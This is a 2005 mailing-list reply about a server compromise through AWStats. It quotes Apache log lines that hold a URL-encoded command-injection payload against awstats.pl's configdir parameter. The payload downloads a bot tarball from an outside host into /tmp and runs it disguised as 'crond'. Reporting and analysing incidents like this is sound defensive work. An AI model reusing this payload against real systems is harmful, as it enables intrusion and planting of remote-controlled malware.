On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote: > > > > "GET > > /cgi-bin/awstats.pl? > > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 > > 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta > > r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec > > ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-" > > > > "GET > > /cgi-bin/awstats.pl? > > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi > > lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 > > psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% > > 2500 HTTP/1.1" 200 634 "-" "-" > > > > > > -cs > > Thank you for this report. > So you are saying that even with awstats 6.4 you got compromised as > Apache did execute the logged command and a trojan then started running > located in /tmp? If so, would you please be so kind and report that > issue to the awstats project guys as soon as possible? Alexander: Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine. BTW, I am MOST appreciative of people who follow-up on their issues as Chris did. Thanks -- Total Quality Management - A Commitment to Excellence Fight Spam: http://www.tqmcube.com/rbldnsd.htm Real Time Updates: rsync -t \ tqmcube.com::spamlists/[README.htm][clients][dynamic][relays][asiaspam] http://www.tqmcube.com/spam_trap.htm
